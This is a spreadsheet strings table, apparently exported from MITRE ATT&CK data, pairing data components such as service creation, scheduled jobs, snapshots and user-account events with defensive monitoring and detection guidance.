    <t>x-mitre-data-component--1067aa74-5796-4d9b-b4f1-a4c9eb6fd9da</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</si>
  <si>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</si>
  <si>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relationship--2cd6c27b-a9c9-4223-885b-75084791d71a</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</si>
  <si>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</si>
  <si>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relationship--f549bc1f-582d-41ce-b9f7-7c5a14f567d6</t>
  </si>
  <si>
    <t>relationship--608afda5-f2ae-4e2a-9834-bd258ef817e0</t>
  </si>
  <si>
    <t>relationship--e1094311-052f-4992-9f6b-c6ada3dcf633</t>
  </si>
  <si>
    <t>relationship--4fae9bb4-0f57-402c-8a44-c39c7a457b09</t>
  </si>
  <si>
    <t>relationship--fa71c737-b017-47ff-bf2a-942643677ff0</t>
  </si>
  <si>
    <t>Scheduled Job Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3</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</si>
  <si>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</si>
  <si>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relationship--2533b541-40a6-4849-a93f-2276c4feefd2</t>
  </si>
  <si>
    <t>Monitor for the anomalous creation of scheduled jobs in container orchestration environments.</t>
  </si>
  <si>
    <t>relationship--58e3de22-ea12-4e27-b0a1-93aee0dc0905</t>
  </si>
  <si>
    <t>Monitor for newly constructed scheduled jobs. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc.</t>
  </si>
  <si>
    <t>relationship--558d7ab6-8c3c-44dd-bba5-d5bb3891aae4</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</si>
  <si>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schedule tasks whose content includes suspicious scripts, extensions or user writable path&lt;/h4&gt;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</si>
  <si>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relationship--fcf2c47e-f487-450e-9bd9-be54110b9e32</t>
  </si>
  <si>
    <t>Monitor newly constructed scheduled jobs that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.</t>
  </si>
  <si>
    <t>relationship--081f3972-ea6b-4607-8492-4374063da037</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</si>
  <si>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</si>
  <si>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relationship--fbfb5985-1c23-4828-9091-2dcfe6b365c2</t>
  </si>
  <si>
    <t>Scheduled Job Metadata</t>
  </si>
  <si>
    <t>x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc</t>
  </si>
  <si>
    <t>Monitor for contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.</t>
  </si>
  <si>
    <t>relationship--fc9eae32-f059-4be4-9afa-947eb38a1635</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</si>
  <si>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</si>
  <si>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relationship--a07479cc-5103-4c3d-bd91-9b229be7a391</t>
  </si>
  <si>
    <t>Scheduled Job Modification</t>
  </si>
  <si>
    <t>x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b</t>
  </si>
  <si>
    <t>Monitor for changes made to scheduled jobs that may attempt to remove artifacts on a host system.</t>
  </si>
  <si>
    <t>relationship--d1d57467-63ad-41b2-99ae-7661ddaf436e</t>
  </si>
  <si>
    <t>relationship--02929ced-4073-4d42-a29b-6aefe93a7a9a</t>
  </si>
  <si>
    <t>Monitor for changes made to scheduled jobs for unexpected modifications to execution launch</t>
  </si>
  <si>
    <t>relationship--4163071e-ec77-4cb5-a796-ca235636cd2b</t>
  </si>
  <si>
    <t>Monitor for changes made to scheduled jobs that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.</t>
  </si>
  <si>
    <t>relationship--b17ad2f9-d568-4ad9-ac8c-e69d147f85fc</t>
  </si>
  <si>
    <t>Script Execution</t>
  </si>
  <si>
    <t>x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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relationship--1a0fb14c-b3e6-489c-be49-2aac6d45892e</t>
  </si>
  <si>
    <t>relationship--17057c58-c25c-486c-a27a-6198013aaa4f</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</si>
  <si>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</si>
  <si>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relationship--cb5e1712-13ba-48b5-9787-893e8228f88d</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</si>
  <si>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</si>
  <si>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relationship--979f2834-66f6-4a30-863e-d63bd1db10a3</t>
  </si>
  <si>
    <t>relationship--2cd211b1-c499-44e7-ae68-1d3def444b2f</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</si>
  <si>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</si>
  <si>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relationship--8801779f-200c-4744-823e-c3405ec9a22e</t>
  </si>
  <si>
    <t>relationship--672625c1-bbe2-44c2-adf8-2055047024db</t>
  </si>
  <si>
    <t>Monitor for any attempts to enable scripts running on a system would be considered suspicious. OLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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20 March 2023</t>
  </si>
  <si>
    <t>relationship--177a2bb5-eca3-4c81-9dfe-81e5fecb38c3</t>
  </si>
  <si>
    <t>relationship--d9ebc7a4-c1d3-45f2-b5c5-2be22939fab7</t>
  </si>
  <si>
    <t>Similarly, AMSI / ETW traces can be used to identify signs of arbitrary code execution from within the memory of potentially compromised processes.(Citation: MDSec Detecting DOTNET)(Citation: Introducing Donut)</t>
  </si>
  <si>
    <t>relationship--179502a9-cab0-4144-afd1-7be586362c2f</t>
  </si>
  <si>
    <t>Consider monitoring and/or blocking suspicious execution of Active Directory PowerShell modules, such as &lt;code&gt;Set-ADUser&lt;/code&gt; and &lt;code&gt;Set-ADAccountControl&lt;/code&gt;, that change account configurations.</t>
  </si>
  <si>
    <t>relationship--ee337a7e-ceef-4666-9535-c25ac04f4056</t>
  </si>
  <si>
    <t>relationship--8283776c-b1c5-44fb-93f2-7d8506f48ef7</t>
  </si>
  <si>
    <t>relationship--7b214aec-caa6-4b28-9551-9e6d285b9f80</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</si>
  <si>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</si>
  <si>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relationship--c8d6c283-67fb-47f4-8d99-7b86aaf92af4</t>
  </si>
  <si>
    <t>relationship--875b8782-2c5c-4ff8-8310-995d36fabeb2</t>
  </si>
  <si>
    <t>Service Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705</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</si>
  <si>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</si>
  <si>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relationship--df7d078e-48a9-4e3e-8dd5-389ca66575e9</t>
  </si>
  <si>
    <t>08 August 2022</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed services/daemons that may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. </t>
  </si>
  <si>
    <t>relationship--0399241d-e0ab-4d0f-9028-1e61eb913d75</t>
  </si>
  <si>
    <t>Monitor for newly constructed services/daemons that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>relationship--92b336d0-b976-482f-a1c1-77c002f9bb88</t>
  </si>
  <si>
    <t>Monitor for newly constructed services/daemons through Windows event logs for event IDs 4697 and 7045. (Citation: Secure Ideas SMB Relay) Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh)</t>
  </si>
  <si>
    <t>relationship--3f1c4a22-7b44-4474-8e3f-192575bc2f35</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s KnockKnock application. </t>
  </si>
  <si>
    <t>relationship--92dddac1-5eb5-4843-b70d-c3b3592fde63</t>
  </si>
  <si>
    <t>Monitor for newly constructed services may create or modify Launch Daemons to execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>relationship--e15a0598-662d-4b09-90fc-5f6d3ebdffd3</t>
  </si>
  <si>
    <t>Monitor for newly constructed services/daemons to execute commands or programs.</t>
  </si>
  <si>
    <t>relationship--61010e1c-505d-45de-a30e-fc01d8b8c8e8</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</si>
  <si>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</si>
  <si>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relationship--7317bd48-16da-4ef1-87c9-fac7fd758d61</t>
  </si>
  <si>
    <t>Monitor for newly constructed services/daemons that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.</t>
  </si>
  <si>
    <t>relationship--5c6b1a1d-9ab4-47de-a8a8-ef7d5b131533</t>
  </si>
  <si>
    <t>Monitor for newly constructed services/daemons that may carry out malicious operations using a virtual instance to avoid detection. Consider monitoring for new [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software.</t>
  </si>
  <si>
    <t>relationship--87cbd402-f941-46ce-9d56-22f4881c16eb</t>
  </si>
  <si>
    <t>Monitor newly constructed services that abuse control manager to execute malicious commands or payloads.</t>
  </si>
  <si>
    <t>relationship--a5745ebf-1687-4e09-9ff4-97f9b741b144</t>
  </si>
  <si>
    <t>relationship--9713c96c-af93-4c3c-8fd7-1ecaa8a577b5</t>
  </si>
  <si>
    <t>Monitor for new constructed systemd services to repeatedly execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>relationship--b335924f-4bf8-4e47-824d-2010add95615</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</si>
  <si>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Analytic 1 : Creation of new services with unusual directory paths such as temporal files in APPDATA &lt;/h4&gt;
&lt;code&gt; suspicious_services = filter ServiceName, ServiceFilePath, ServiceType, ServiceStartType, ServiceAccountName where
  (event_id == "7045" OR event_id == "4697") AND
  (ServiceFilePath LIKE '%APPDATA%' OR ServiceImagePath LIKE '%PUBLIC%')&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--6ca6f07c-5e37-44c4-b528-c1dd4d609171</t>
  </si>
  <si>
    <t>Service Metadata</t>
  </si>
  <si>
    <t>x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c</t>
  </si>
  <si>
    <t>BITS runs as a service and its status can be checked with the Sc query utility (&lt;code&gt;sc query bits&lt;/code&gt;).(Citation: Microsoft Issues with BITS July 2011)</t>
  </si>
  <si>
    <t>relationship--eb8bc00c-91f6-434e-bfdb-ecb72c5e4391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</si>
  <si>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Stopping services events are Windows Event Code 7036.
&lt;h4&gt;Analytic 1 - User Activity from Stopping Windows Defensive Services&lt;/h4&gt;
&lt;code&gt;log_name == "System" AND
event_code == "7036"
param1 in ["Windows Defender", "Windows Firewall"] AND
param2 == "stopped"&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--73cba115-ad81-456f-a52b-54f97f42b218</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. </t>
  </si>
  <si>
    <t>relationship--0069b158-3cc8-4e22-af63-6c57cb58f9d6</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</si>
  <si>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</si>
  <si>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relationship--6f3dd93e-6682-490f-bd56-9bc25c489d25</t>
  </si>
  <si>
    <t>Monitor contextual data about a service/daemon, which may include information such as name, service executable, start type that that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.</t>
  </si>
  <si>
    <t>relationship--7d20e7fe-b5e6-4ee9-8d5f-dd3e9ca9365d</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor the status of services involved in system recovery.
Note: For Windows, Event ID 7040 can be used to alert on changes to the start type of a service (e.g., going from enabled at startup to disabled) associated with system recovery. </t>
  </si>
  <si>
    <t>relationship--8a2aa16f-6299-4899-8a73-d1926a499093</t>
  </si>
  <si>
    <t>Monitor for changes made to services for unexpected modifications to names, descriptions, and/or start types</t>
  </si>
  <si>
    <t>relationship--fa6e0dbf-a53f-4763-abeb-bc0cf0f30b9a</t>
  </si>
  <si>
    <t>Monitor for contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.</t>
  </si>
  <si>
    <t>relationship--87834403-41ab-45ab-b755-d779402ac9e5</t>
  </si>
  <si>
    <t>Alterations to the service binary path or the service startup type changed to disabled may be suspicious.</t>
  </si>
  <si>
    <t>relationship--a156066b-97c8-4e57-a393-048135906b93</t>
  </si>
  <si>
    <t>Hashing of binaries and service executables could be used to detect replacement against historical data.</t>
  </si>
  <si>
    <t>relationship--e7d0b6de-24bb-464d-a317-351e20d75b69</t>
  </si>
  <si>
    <t>Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior.</t>
  </si>
  <si>
    <t>relationship--ee139d6e-190f-4def-bdf2-a9cf77720125</t>
  </si>
  <si>
    <t>Service Modification</t>
  </si>
  <si>
    <t>x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222</t>
  </si>
  <si>
    <t>Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline.</t>
  </si>
  <si>
    <t>relationship--25fc355e-1323-4e51-942d-aa5ddd7d3525</t>
  </si>
  <si>
    <t>Monitor for changes made to launch agents to repeatedly execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>relationship--1e2844e5-5d47-4305-befa-f20ae73bc3f9</t>
  </si>
  <si>
    <t>Monitor services for changes made to Launch Daemons to execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>relationship--88f865ea-0201-4328-a777-8a648daf32ef</t>
  </si>
  <si>
    <t>Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity.</t>
  </si>
  <si>
    <t>relationship--2a0a9b85-5cb1-430b-8376-bab13b26cd29</t>
  </si>
  <si>
    <t>Analyze the contents of &lt;code&gt;.service&lt;/code&gt; files present on the file system and ensure that they refer to legitimate, expected executables.</t>
  </si>
  <si>
    <t>relationship--b8bc3045-4d78-43c1-b06a-6003f094d43e</t>
  </si>
  <si>
    <t>Monitor for changes made to Windows services to repeatedly execute malicious payloads as part of persistence.
&lt;h4&gt;Analytic 1 : System services via registry modifications &lt;/h4&gt;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t>
  </si>
  <si>
    <t>relationship--e30f869c-1d18-4646-a5fd-59ac518bc52c</t>
  </si>
  <si>
    <t>Snapshot Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--3da222e6-53f3-451c-a239-0b405c009432</t>
  </si>
  <si>
    <t>attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1</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</si>
  <si>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</si>
  <si>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relationship--5dc3e7ec-34b2-41db-a49a-4b4de637ec7c</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</si>
  <si>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</si>
  <si>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relationship--2222e5f7-a027-4823-ab58-038d006f98bf</t>
  </si>
  <si>
    <t>relationship--1cf8df71-e439-43cd-b6cd-c5d971f41dc7</t>
  </si>
  <si>
    <t>Snapshot Deletion</t>
  </si>
  <si>
    <t>x-mitre-data-component--16e07530-764b-4d83-bae0-cdbfc31bf21d</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of a snapshot (ex: AWS delete-snapshot)</t>
  </si>
  <si>
    <t>relationship--0dbeb3a0-ee5c-4c90-9c46-886af5a34bd4</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of snapshots (ex: AWS `delete-snapshot`), especially those associated with cloud backups.</t>
  </si>
  <si>
    <t>relationship--9be2a18c-f66c-4df1-a872-49f34f2f6a77</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</si>
  <si>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</si>
  <si>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relationship--f6242361-3056-49da-8e2a-82e1e893b039</t>
  </si>
  <si>
    <t>Snapshot Enumeration</t>
  </si>
  <si>
    <t>x-mitre-data-component--ffd73905-2e51-4f2d-8549-e72fb0eb6c38</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</si>
  <si>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</si>
  <si>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relationship--d071081b-3e91-47dd-a5a2-a6b590a2b4fe</t>
  </si>
  <si>
    <t>Snapshot Metadata</t>
  </si>
  <si>
    <t>x-mitre-data-component--8bc66f94-54a9-4be4-bdd1-fe90df643774</t>
  </si>
  <si>
    <t>Periodically baseline snapshots to identify malicious modifications or additions.</t>
  </si>
  <si>
    <t>relationship--61bf0521-9ebe-47d5-8a61-6aeb3b502aee</t>
  </si>
  <si>
    <t>relationship--bf9b3540-c7ab-46bf-b880-b5cabe0d5f79</t>
  </si>
  <si>
    <t>relationship--95976fa3-b0ae-463a-a00b-d5a0b6068d63</t>
  </si>
  <si>
    <t>Snapshot Modification</t>
  </si>
  <si>
    <t>x-mitre-data-component--f1eb6ea9-f3ab-414f-af35-2d5427199984</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</si>
  <si>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</si>
  <si>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relationship--b0dcef9d-9fea-4471-8e26-16e272af5687</t>
  </si>
  <si>
    <t>Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs.</t>
  </si>
  <si>
    <t>relationship--3be1275c-6c07-4ddd-93d7-2fd11300243b</t>
  </si>
  <si>
    <t>x-mitre-data-component--8fb2f315-1aca-4cef-ae0d-8105e1f95985</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</si>
  <si>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</si>
  <si>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relationship--779a41f1-84ca-4cac-91fb-826bc102d5bd</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</si>
  <si>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</si>
  <si>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relationship--d8d1c202-705c-4c13-823c-ff622969d5b1</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</si>
  <si>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</si>
  <si>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relationship--d1f0b6ab-f347-4741-bede-b7bfaf975403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</si>
  <si>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</si>
  <si>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relationship--27e4d51a-77c3-462c-8eb7-0a690f61bb98</t>
  </si>
  <si>
    <t>User Account Authentication</t>
  </si>
  <si>
    <t>x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e</t>
  </si>
  <si>
    <t xml:space="preserve"> Monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network.</t>
  </si>
  <si>
    <t>relationship--60069e30-f64a-4515-9c40-b3a9f455f780</t>
  </si>
  <si>
    <t>Monitor for an attempts by a user to gain access to a network or computing resource, often by providing credentials via remote terminal services, that do not have a corresponding entry in a command history file.</t>
  </si>
  <si>
    <t>relationship--eaa943db-2953-4131-84a2-6b6e1ce9b835</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</si>
  <si>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</si>
  <si>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relationship--102733a2-3df3-4b80-babf-89653b5357f4</t>
  </si>
  <si>
    <t>16 March 2023</t>
  </si>
  <si>
    <t>attack-pattern--19bf235b-8620-4997-b5b4-94e0659ed7c3</t>
  </si>
  <si>
    <t>It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>relationship--ad4acffd-0f97-4e13-84ad-1290b1884ab5</t>
  </si>
  <si>
    <t>Correlate other security systems with login information, such as user accounts, IP addresses, and login names.(Citation: Mandiant Cloudy Logs 2023)</t>
  </si>
  <si>
    <t>relationship--ef3798af-43f4-4a09-b969-2bcb6283a310</t>
  </si>
  <si>
    <t>It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>relationship--213ba52c-8404-4069-9c8b-3b017078d601</t>
  </si>
  <si>
    <t xml:space="preserve"> Monitor for many failed authentication attempts across various accounts that may result from credential stuffing attempts.(Citation: Mandiant Cloudy Logs 2023)</t>
  </si>
  <si>
    <t>relationship--8afca8e1-320a-4eed-b865-995a9b6b3920</t>
  </si>
  <si>
    <t>Monitor for an attempt by a user to gain access to a network or computing resource, often by providing credentials</t>
  </si>
  <si>
    <t>relationship--b6092abb-41b3-4aab-8e13-a7832bc60190</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</si>
  <si>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</si>
  <si>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relationship--0e7062b4-4010-4806-afcb-299ddef0c31c</t>
  </si>
  <si>
    <t>Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.</t>
  </si>
  <si>
    <t>relationship--5219ccae-828e-4ff7-9d69-13db836ea61c</t>
  </si>
  <si>
    <t>Monitor for an attempt by a user to gain access to a network or computing resource, often by providing credentials that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.</t>
  </si>
  <si>
    <t>relationship--2e4d9390-d541-4e50-9b9c-1eee43d7cd9c</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</si>
  <si>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</si>
  <si>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relationship--fe1cd6bf-abca-4032-8c94-15168005e96d</t>
  </si>
  <si>
    <t>Monitor for account authentications in which MFA credentials are not provided by the user account to the authenticating entity.</t>
  </si>
  <si>
    <t>relationship--3ce8f37c-c8da-4235-9621-4923988fa877</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for account authentications in which MFA credentials are not provided by the user account to the authenticating entity. </t>
  </si>
  <si>
    <t>relationship--64a76055-30c2-416f-be02-67f26c2c3b58</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</si>
  <si>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</si>
  <si>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relationship--43317155-fd55-4fc1-a253-bff4261dba6e</t>
  </si>
  <si>
    <t>15 April 2022</t>
  </si>
  <si>
    <t>Monitoring for Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.</t>
  </si>
  <si>
    <t>relationship--d4af8174-461b-4276-bcb6-44b2cb04928a</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</si>
  <si>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</si>
  <si>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relationship--bc79d096-2424-4b1c-b121-5e89d221603f</t>
  </si>
  <si>
    <t>Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.</t>
  </si>
  <si>
    <t>relationship--3b8be7a1-07b7-4e59-8435-c584a09972a5</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</si>
  <si>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</si>
  <si>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relationship--0127e0a7-fce7-41f8-bdba-ed634e0eb68f</t>
  </si>
  <si>
    <t xml:space="preserve"> Monitor for many failed authentication attempts across various accounts that may result from password guessing attempts.(Citation: Mandiant Cloudy Logs 2023)</t>
  </si>
  <si>
    <t>relationship--2a7307c0-7020-4fc1-9cec-183df4795d6e</t>
  </si>
  <si>
    <t xml:space="preserve"> Monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.(Citation: Mandiant Cloudy Logs 2023)</t>
  </si>
  <si>
    <t>relationship--8bd2ef35-fc98-4593-b4da-e54e163649dd</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</si>
  <si>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</si>
  <si>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relationship--97edbd3f-9470-4845-ab9f-245a5248ab59</t>
  </si>
  <si>
    <t>Monitor for user authentication attempts, when requesting access tokens to services, that failed because of Conditional Access Policies (CAP). Some SAML tokens features, such as the location of a user, may not be as easy to claim.</t>
  </si>
  <si>
    <t>relationship--611076ef-ae96-4540-a9a4-35cf617ea83a</t>
  </si>
  <si>
    <t>Monitor for an attempt by a user to gain access to a network or computing resource, often by providing credentials that may search compromised systems to find and obtain insecurely stored credentials.</t>
  </si>
  <si>
    <t>relationship--fd1e3a4f-1d0c-453b-970c-5af837aac258</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</si>
  <si>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</si>
  <si>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relationship--eeebdabe-73e3-416c-9177-1b6ae5640d72</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for an attempt by a user that may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. </t>
  </si>
  <si>
    <t>relationship--d9e8d390-35c6-437a-a7e4-0c64a339b2c4</t>
  </si>
  <si>
    <t>User Account Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--deb22295-7e37-4a3b-ac6f-c86666fbe63d</t>
  </si>
  <si>
    <t>attack-pattern--a009cb25-4801-4116-9105-80a91cf15c1b</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</si>
  <si>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</si>
  <si>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relationship--2caa01e8-5c60-47d6-aa48-989ed8641c53</t>
  </si>
  <si>
    <t>06 March 2023</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</si>
  <si>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</si>
  <si>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relationship--eafd7faf-dfeb-4f62-aa67-19b62f3114a4</t>
  </si>
  <si>
    <t>relationship--f96e326d-5c91-4c22-9553-2faa4dc63e6f</t>
  </si>
  <si>
    <t>Monitor for newly constructed user accounts, such as userIDs under 500 on macOS, that may mask the presence of user accounts they create or modify.</t>
  </si>
  <si>
    <t>relationship--18730396-0ac8-4013-8d5c-5f23b29d3efe</t>
  </si>
  <si>
    <t>Monitor for newly constructed user accounts that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>relationship--b65699be-5302-4e29-a3ac-978c82f29166</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</si>
  <si>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</si>
  <si>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relationship--34709fc8-8aa3-4098-a347-18b391ead8d2</t>
  </si>
  <si>
    <t>User Account Deletion</t>
  </si>
  <si>
    <t>x-mitre-data-component--d6257b8e-869c-41c0-8731-fdca40858a91</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</si>
  <si>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</si>
  <si>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relationship--f7a49aed-41f9-4fff-b7d5-28cd83671aff</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</si>
  <si>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</si>
  <si>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relationship--1eb3d79f-d9b9-45ea-9fef-f7759b984749</t>
  </si>
  <si>
    <t>09 March 2023</t>
  </si>
  <si>
    <t>relationship--359df603-3053-419e-82f9-1fc57715caf5</t>
  </si>
  <si>
    <t>User Account Metadata</t>
  </si>
  <si>
    <t>x-mitre-data-component--b5d0492b-cda4-421c-8e51-ed2b8d85c5d0</t>
  </si>
  <si>
    <t>Monitor for contextual data about an account, which may include a username, user ID, environmental data, etc. that may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls.</t>
  </si>
  <si>
    <t>relationship--7cd8325a-1929-44bd-a1d2-34e5f91d26b7</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</si>
  <si>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</si>
  <si>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relationship--97ceb4a8-dd9c-402b-8a80-0d0f2c4f5d5a</t>
  </si>
  <si>
    <t>Monitor for contextual data about an account, which may include a username, user ID, environmental data that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>relationship--f1a27232-5963-4041-9249-35aebd2f0aa0</t>
  </si>
  <si>
    <t>Monitor for contextual data about an account that may attempt to access detailed information about the password policy used within an enterprise network or cloud environment.</t>
  </si>
  <si>
    <t>relationship--7ab091db-ecf4-4137-b3a4-d2e20b31259a</t>
  </si>
  <si>
    <t>Monitor Fine-Grained Password Policies and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)</t>
  </si>
  <si>
    <t>relationship--d9bcecd1-fbe7-4b70-a840-ecf53f0cd56f</t>
  </si>
  <si>
    <t>Examine data in user’s SID-History attributes</t>
  </si>
  <si>
    <t>relationship--82837e38-96f0-41d2-a499-c21047c194f6</t>
  </si>
  <si>
    <t>User Account Modification</t>
  </si>
  <si>
    <t>x-mitre-data-component--d27b0089-2c39-4b6c-84ff-303e48657e77</t>
  </si>
  <si>
    <t>Log cloud API calls to assume, create, or impersonate additional roles, policies, and permissions. Review uses of just-in-time access to ensure that any justifications provided are valid and only expected actions were taken.</t>
  </si>
  <si>
    <t>relationship--35868441-95dc-41af-98d3-442aee51d777</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</si>
  <si>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</si>
  <si>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relationship--5f93b770-89f7-4aeb-82f5-cef2f01aef40</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</si>
  <si>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</si>
  <si>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relationship--f8d812a6-c99d-48cb-93b7-c269150c59bd</t>
  </si>
  <si>
    <t>attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd</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</si>
  <si>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</si>
  <si>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relationship--1c743268-3f64-4cc6-b911-c5ebf79310a7</t>
  </si>
  <si>
    <t>attack-pattern--2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3</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</si>
  <si>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</si>
  <si>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relationship--ad1695a7-76ee-493c-a983-9fa240b8ebb6</t>
  </si>
  <si>
    <t>attack-pattern--35d30338-5bfa-41b0-a170-ec06dfd75f64</t>
  </si>
  <si>
    <t xml:space="preserve">Collect usage logs from accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to high-privileged cluster roles that go over a certain threshold of known admins. </t>
  </si>
  <si>
    <t>relationship--d7863e39-edec-4c7d-9e60-d16b632fe940</t>
  </si>
  <si>
    <t>Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.</t>
  </si>
  <si>
    <t>relationship--f28bd1ce-178d-4a02-aa13-3f70319e1f3a</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor user accounts for new and suspicious device associations, such as those originating from unusual sources, occurring at unusual times, or following a suspicious login.(Citation: Microsoft DEV-0537) </t>
  </si>
  <si>
    <t>relationship--e36f147a-2893-4e01-869f-d149f2a3469d</t>
  </si>
  <si>
    <t>Monitor for changes to account settings associated with users/tenants that may impact defensive logging capabilities, such as the `Update User` and `Change User License` events in the Azure AD audit log.(Citation: Mandiant Defend UNC2452 White Paper)</t>
  </si>
  <si>
    <t>relationship--e650e1d9-0ba3-47d1-a8c2-3cbb65954fbb</t>
  </si>
  <si>
    <t>relationship--c2ccc0af-d25a-4ea2-af7c-a2f71f2aba44</t>
  </si>
  <si>
    <t>Monitor for the enrollment of devices and user accounts with alternative security settings that do not require MFA credentials for successful logon.</t>
  </si>
  <si>
    <t>relationship--7a805516-9819-4699-88c2-0a70afc97da0</t>
  </si>
  <si>
    <t>Monitor for the enrollment of devices and user accounts with alternative security settings that do not require MFA credentials for successful logon. Monitor for attempts to disable MFA on individual user accounts.(Citation: Mandiant Cloudy Logs 2023)</t>
  </si>
  <si>
    <t>relationship--9cfd4317-bc53-4efe-b952-9b9f245701f9</t>
  </si>
  <si>
    <t>attack-pattern--890c9858-598c-401d-a4d5-c67ebcdd703a</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</si>
  <si>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</si>
  <si>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relationship--38f5e690-1ed8-45a8-a6cc-9dfe8e953706</t>
  </si>
  <si>
    <t>attack-pattern--6fa224c7-5091-4595-bf15-3fc9fe2f2c7c</t>
  </si>
  <si>
    <t>Log API calls to assume, create, or impersonate additional roles, policies, and permissions. Review uses of just-in-time access to ensure that any justifications provided are valid and only expected actions were taken.</t>
  </si>
  <si>
    <t>relationship--53a0d647-a24c-43e1-ab02-7dd18e9182d2</t>
  </si>
  <si>
    <t>21 September 2023</t>
  </si>
  <si>
    <t>Volume Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--dad75cc7-5bae-4175-adb4-ca1962d8650e</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</si>
  <si>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</si>
  <si>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relationship--a6c9484e-d8b3-4c5c-bb2a-72a4863c5d63</t>
  </si>
  <si>
    <t>Volume Deletion</t>
  </si>
  <si>
    <t>x-mitre-data-component--3acecdde-c327-4498-9bb8-33a2e63c6c57</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of a cloud volume (ex: AWS delete-volume)</t>
  </si>
  <si>
    <t>relationship--ded09cd6-73be-488d-8e3c-bff62324b21b</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</si>
  <si>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</si>
  <si>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relationship--d4c624e3-7520-4e01-990e-b787a1320eff</t>
  </si>
  <si>
    <t>Volume Enumeration</t>
  </si>
  <si>
    <t>x-mitre-data-component--ec225357-8197-47a4-a9cd-57741d592877</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</si>
  <si>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</si>
  <si>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relationship--bc1bfbc2-aeff-4e8b-a053-adc669efdfcd</t>
  </si>
  <si>
    <t>Volume Metadata</t>
  </si>
  <si>
    <t>x-mitre-data-component--0f72bf50-35b3-419d-ab95-70f9b6a818dd</t>
  </si>
  <si>
    <t>Periodically baseline cloud block storage volumes to identify malicious modifications or additions.</t>
  </si>
  <si>
    <t>relationship--86ea4cab-4169-4471-9f45-6d6defc8b0c3</t>
  </si>
  <si>
    <t>Volume Modification</t>
  </si>
